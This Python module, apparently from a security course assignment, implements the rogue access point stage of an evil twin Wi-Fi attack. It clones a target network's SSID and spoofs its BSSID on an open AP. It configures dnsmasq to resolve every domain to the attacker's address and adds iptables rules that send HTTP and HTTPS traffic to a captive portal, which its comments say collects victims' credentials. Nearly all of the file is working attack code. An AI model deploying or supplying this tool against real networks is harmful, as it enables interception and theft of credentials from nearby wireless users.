"""
rogue_ap.py – Evil Twin (Rogue Access Point) Module
-----------------------------------------------------
Creates and manages a malicious AP that appears identical to the target.
Uses hostapd (AP daemon) and dnsmasq (DHCP + DNS) – both are explicitly
permitted system utilities per the assignment guidelines.

Stage 4 of the Evil Twin attack: Malicious Network Creation.
"""

import os
import subprocess
import time
import signal
from pathlib import Path

# Directory for temporary config files generated at runtime
CONFIGS_DIR = Path(__file__).parent / "configs"
CONFIGS_DIR.mkdir(exist_ok=True)

HOSTAPD_CONF  = CONFIGS_DIR / "hostapd.conf"
DNSMASQ_CONF  = CONFIGS_DIR / "dnsmasq.conf"
DNSMASQ_LEASE = CONFIGS_DIR / "dnsmasq.leases"

# The IP address the Evil Twin AP will use on the rogue interface
AP_IP      = "10.0.0.1"
DHCP_START = "10.0.0.10"
DHCP_END   = "10.0.0.50"
SUBNET     = "255.255.255.0"


# ──────────────────────────────────────────────
# Config file builders
# ──────────────────────────────────────────────

def _write_hostapd_conf(iface: str, ssid: str, channel: int, bssid: str):
    """
    Generate a hostapd config file for an OPEN network.

    We create an open (no password) network intentionally:
    - The real network may be WPA2, but we can't know the PSK
    - Clients will still connect because they're being deauthed from the real AP
    - The Captive Portal handles credential collection

    Key fields:
        interface  – which WiFi adapter to use as the AP
        ssid       – must match the target exactly
        bssid      – we spoof the real AP's MAC address
        channel    – same channel as the real AP
        hw_mode    – g = 2.4GHz 802.11g (compatible with most devices)
    """
    conf = f"""# hostapd configuration – generated by evil_twin
interface={iface}
driver=nl80211
ssid={ssid}
bssid={bssid}
hw_mode=g
channel={channel}
macaddr_acl=0
ignore_broadcast_ssid=0

# No encryption – open network (Captive Portal handles auth)
auth_algs=1
wpa=0

# Logging
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
"""
    HOSTAPD_CONF.write_text(conf)


def _write_dnsmasq_conf(iface: str):
    """
    Generate a dnsmasq config for DHCP + DNS hijacking.

    - DHCP: hands out IPs to clients that connect to our AP
    - DNS:  resolves ALL domain names to our AP_IP (10.0.0.1)
            → every website the victim visits goes to our Captive Portal
    """
    conf = f"""# dnsmasq configuration – generated by evil_twin
interface={iface}
dhcp-range={DHCP_START},{DHCP_END},{SUBNET},12h
dhcp-leasefile={DNSMASQ_LEASE}
dhcp-option=3,{AP_IP}
dhcp-option=6,{AP_IP}
server={AP_IP}

# DNS hijack: resolve everything to our AP
address=/#/{AP_IP}

# Logging
log-queries
log-facility=/tmp/evil_twin_dnsmasq.log

no-resolv
no-hosts
"""
    DNSMASQ_CONF.write_text(conf)


# ──────────────────────────────────────────────
# Network interface setup
# ──────────────────────────────────────────────

def _configure_ap_interface(iface: str):
    """
    Assign the AP_IP address to the rogue AP interface.
    This is the IP clients will receive as their gateway.
    """
    subprocess.run(["ip", "link", "set", iface, "up"],          check=True)
    # Flush any existing addresses first
    subprocess.run(["ip", "addr", "flush", "dev", iface],       check=True)
    subprocess.run(
        ["ip", "addr", "add", f"{AP_IP}/24", "dev", iface],
        check=True
    )


def _enable_ip_forwarding():
    """
    Enable Linux IP forwarding so packets from clients can be routed.
    Written to /proc directly – takes effect immediately.
    """
    with open("/proc/sys/net/ipv4/ip_forward", "w") as f:
        f.write("1")


def _setup_iptables(iface_ap: str):
    """
    Set up iptables rules to redirect all HTTP traffic (port 80 and 443)
    to our Captive Portal (port 8080).

    Also sets up NAT masquerading so clients appear to have internet
    (even though we control the DNS and they'll only see our portal).
    """
    # Flush existing rules for clean state
    subprocess.run(["iptables", "-t", "nat", "-F"], check=True)

    # Redirect HTTP → Captive Portal
    subprocess.run([
        "iptables", "-t", "nat", "-A", "PREROUTING",
        "-i", iface_ap, "-p", "tcp", "--dport", "80",
        "-j", "REDIRECT", "--to-port", "8080"
    ], check=True)

    # Redirect HTTPS → Captive Portal (for browsers that try HTTPS first)
    subprocess.run([
        "iptables", "-t", "nat", "-A", "PREROUTING",
        "-i", iface_ap, "-p", "tcp", "--dport", "443",
        "-j", "REDIRECT", "--to-port", "8080"
    ], check=True)


def _clear_iptables():
    """Remove the NAT rules we added – called on cleanup."""
    subprocess.run(["iptables", "-t", "nat", "-F"],
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


# ──────────────────────────────────────────────
# Process management
# ──────────────────────────────────────────────

class RogueAP:
    """
    Manages the lifecycle of the Evil Twin AP.
    Start with .start(), stop cleanly with .stop().
    """

    def __init__(self, iface_ap: str, ssid: str, bssid: str, channel: int):
        """
        Args:
            iface_ap:  Interface to use as the AP (e.g. 'wlan1')
            ssid:      SSID to clone from the target network
            bssid:     BSSID to spoof (target AP's MAC address)
            channel:   Channel the target AP uses
        """
        self.iface_ap  = iface_ap
        self.ssid      = ssid
        self.bssid     = bssid
        self.channel   = channel
        self._hostapd  = None   # subprocess.Popen handle
        self._dnsmasq  = None   # subprocess.Popen handle
        self.running   = False

    def start(self):
        """
        Full startup sequence:
        1. Write config files
        2. Configure the AP interface IP
        3. Enable IP forwarding
        4. Launch hostapd (creates the AP)
        5. Launch dnsmasq (DHCP + DNS hijack)
        6. Set up iptables redirect to Captive Portal
        """
        print(f"[*] Configuring Evil Twin: SSID={self.ssid!r} "
              f"BSSID={self.bssid} CH={self.channel}")

        # 1. Generate configs
        _write_hostapd_conf(self.iface_ap, self.ssid, self.channel, self.bssid)
        _write_dnsmasq_conf(self.iface_ap)

        # 2. Configure interface
        _configure_ap_interface(self.iface_ap)

        # 3. IP forwarding
        _enable_ip_forwarding()

        # 4. Start hostapd
        self._hostapd = subprocess.Popen(
            ["hostapd", str(HOSTAPD_CONF)],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        time.sleep(2)   # Give hostapd time to initialize

        if self._hostapd.poll() is not None:
            raise RuntimeError("[!] hostapd failed to start. Check interface and config.")

        print(f"[+] hostapd running (PID {self._hostapd.pid})")

        # 5. Start dnsmasq
        self._dnsmasq = subprocess.Popen(
            ["dnsmasq", "--no-daemon", "-C", str(DNSMASQ_CONF)],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        time.sleep(1)

        if self._dnsmasq.poll() is not None:
            raise RuntimeError("[!] dnsmasq failed to start. Check config.")

        print(f"[+] dnsmasq running (PID {self._dnsmasq.pid})")

        # 6. iptables
        _setup_iptables(self.iface_ap)
        print(f"[+] iptables redirect: HTTP/HTTPS → Captive Portal (port 8080)")

        self.running = True
        print(f"[+] Evil Twin is live on '{self.ssid}'")

    def stop(self):
        """Tear down everything cleanly."""
        print("[*] Shutting down Evil Twin AP...")
        self.running = False

        if self._hostapd:
            self._hostapd.terminate()
            self._hostapd.wait()
            print("[+] hostapd stopped")

        if self._dnsmasq:
            self._dnsmasq.terminate()
            self._dnsmasq.wait()
            print("[+] dnsmasq stopped")

        _clear_iptables()
        print("[+] iptables rules cleared")

        # Clean up temp files
        for f in (HOSTAPD_CONF, DNSMASQ_CONF, DNSMASQ_LEASE):
            try:
                f.unlink()
            except FileNotFoundError:
                pass

    def is_running(self) -> bool:
        if not self.running:
            return False
        # Check both processes are still alive
        return (self._hostapd and self._hostapd.poll() is None and
                self._dnsmasq  and self._dnsmasq.poll()  is None)
